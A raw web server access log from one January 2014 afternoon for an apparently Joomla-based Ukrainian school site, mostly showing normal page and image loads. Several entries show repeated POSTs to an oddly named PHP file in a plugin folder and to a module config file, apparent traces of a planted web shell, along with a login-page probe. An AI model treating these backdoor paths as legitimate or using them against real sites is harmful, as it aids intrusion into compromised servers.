71.20.159.71 - - [09/Jan/2014:13:13:23 +0200] 404 "GET /wp-login.php HTTP/1.1" 471 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

5.83.132.144 - - [09/Jan/2014:13:14:30 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:14:15 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:16:01 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:15:46 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:17:33 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:17:18 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:19:02 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:18:48 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:20:38 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:20:23 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:22:10 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:21:55 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:23:41 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:23:27 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:25:12 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:24:57 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

91.123.150.229 - - [09/Jan/2014:13:26:15 +0200] "POST /modules/mod_administrator/config.php HTTP/1.0" 200 392 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"

91.123.150.229 - - [09/Jan/2014:13:26:15 +0200] 200 "POST /modules/mod_administrator/config.php HTTP/1.1" 250 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36" "-"

5.83.132.144 - - [09/Jan/2014:13:26:43 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

46.217.0.131 - - [09/Jan/2014:13:26:57 +0200] "GET /public_html/ HTTP/1.0" 404 428 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:26:57 +0200] 404 "GET /public_html/ HTTP/1.1" 202 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:57 +0200] "GET /favicon.ico HTTP/1.0" 404 426 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:26:57 +0200] 404 "GET /favicon.ico HTTP/1.1" 200 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:58 +0200] "GET / HTTP/1.0" 200 6489 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET / HTTP/1.1" 6178 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/system/css/system.css HTTP/1.1" 614 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/system/css/general.css HTTP/1.1" 2793 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/template.css HTTP/1.1" 6413 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/joomla.css HTTP/1.1" 3742 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/custom.css HTTP/1.1" 1763 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/modules.css HTTP/1.1" 4782 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/typography.css HTTP/1.1" 5640 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/css3.css HTTP/1.1" 550 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/styles/style1.css HTTP/1.1" 1179 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /templates/shaper_vision/css/menu.css HTTP/1.1" 3887 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /media/system/js/core.js HTTP/1.1" 3616 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /media/system/css/system.css HTTP/1.1" 1592 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /media/system/js/caption.js HTTP/1.1" 800 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /plugins/system/helix/js/menu.js HTTP/1.1" 4164 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /plugins/system/helix/js/totop.js HTTP/1.1" 1029 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:26:59 +0200] 200 "GET /media/system/js/mootools-core.js HTTP/1.1" 31176 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /media/system/js/mootools-more.js HTTP/1.1" 75591 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/stories/inside/ny2013-2014.jpg HTTP/1.1" 72122 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/photo/2013/klass/klass.jpg HTTP/1.1" 14548 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/photo/2013/muz/muz.jpg HTTP/1.1" 17872 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/photo/2013/vipusk/vipusk.jpg HTTP/1.1" 42311 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/photo/2013/talant/talant.jpg HTTP/1.1" 47128 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:00 +0200] 200 "GET /images/photo/2012/podyaka/podyaka.jpg HTTP/1.1" 20689 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2013/nr/nr.jpg HTTP/1.1" 91028 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2012/1ver/1ver.jpg HTTP/1.1" 22989 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2012/zoo.jpg HTTP/1.1" 13565 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/grass.png HTTP/1.1" 6426 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/bg.jpg HTTP/1.1" 5180 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2012/ostannij_dzvonik/dzvn.jpg HTTP/1.1" 11622 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/logo.png HTTP/1.1" 15888 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/nav-bg.png HTTP/1.1" 2898 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/nav-l.png HTTP/1.1" 3673 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/nav-r.png HTTP/1.1" 14316 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-tr.png HTTP/1.1" 3213 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2013/1/1veres.jpg HTTP/1.1" 127730 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-tl.png HTTP/1.1" 3237 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-tm.png HTTP/1.1" 3051 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-l.png HTTP/1.1" 3650 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-r.png HTTP/1.1" 3860 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-bl.png HTTP/1.1" 2891 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-br.png HTTP/1.1" 3166 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/box-bm.png HTTP/1.1" 3047 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/article_separator.png HTTP/1.1" 1633 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/typo/bullet.gif HTTP/1.1" 55 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/h3-l.png HTTP/1.1" 3160 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/h3-r.png HTTP/1.1" 3383 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/box/h3-m.png HTTP/1.1" 3315 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /images/photo/2013/dp/dp.jpg HTTP/1.1" 224420 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:01 +0200] 200 "GET /templates/shaper_vision/images/footer-bg.png HTTP/1.1" 16888 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] 200 "GET /images/photo/2013/podarunki/podarunki.jpg HTTP/1.1" 21031 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] 200 "GET /images/photo/2012/kids_games/kids_games.jpg HTTP/1.1" 6602 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] 200 "GET /images/photo/2012/rizdvo/rizdvo.jpg HTTP/1.1" 67386 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] 200 "GET /templates/shaper_vision/images/favicon.ico HTTP/1.1" 1406 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] "GET / HTTP/1.0" 200 3025 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:27:02 +0200] 200 "GET / HTTP/1.1" 2801 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

5.83.132.144 - - [09/Jan/2014:13:26:28 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:28:18 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

208.115.113.87 - - [09/Jan/2014:13:28:24 +0200] 200 "GET /robots.txt HTTP/1.1" 849 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; [email protected])" "-"

208.115.113.87 - - [09/Jan/2014:13:28:24 +0200] 200 "GET /robots.txt HTTP/1.1" 849 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; [email protected])" "-"

5.83.132.144 - - [09/Jan/2014:13:28:03 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:29:51 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:29:36 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:31:48 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:31:46 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:33:38 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:33:24 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:34:53 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:34:38 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

65.52.241.141 - - [09/Jan/2014:13:36:10 +0200] "GET / HTTP/1.0" 200 3025 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"

65.52.241.141 - - [09/Jan/2014:13:36:10 +0200] 200 "GET / HTTP/1.1" 2801 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "-"

5.83.132.144 - - [09/Jan/2014:13:36:24 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:36:09 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:37:56 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:37:41 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:39:29 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:39:14 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:41:03 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:40:48 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:42:34 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:42:19 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:44:06 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:43:50 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:45:33 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:45:19 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:47:08 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:46:53 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:48:40 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:48:26 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

46.201.33.238 - - [09/Jan/2014:13:49:10 +0200] "GET / HTTP/1.0" 200 5520 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET / HTTP/1.1" 5296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/system/css/system.css HTTP/1.1" 614 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/system/css/general.css HTTP/1.1" 2793 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/template.css HTTP/1.1" 6413 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/joomla.css HTTP/1.1" 3742 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/custom.css HTTP/1.1" 1763 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

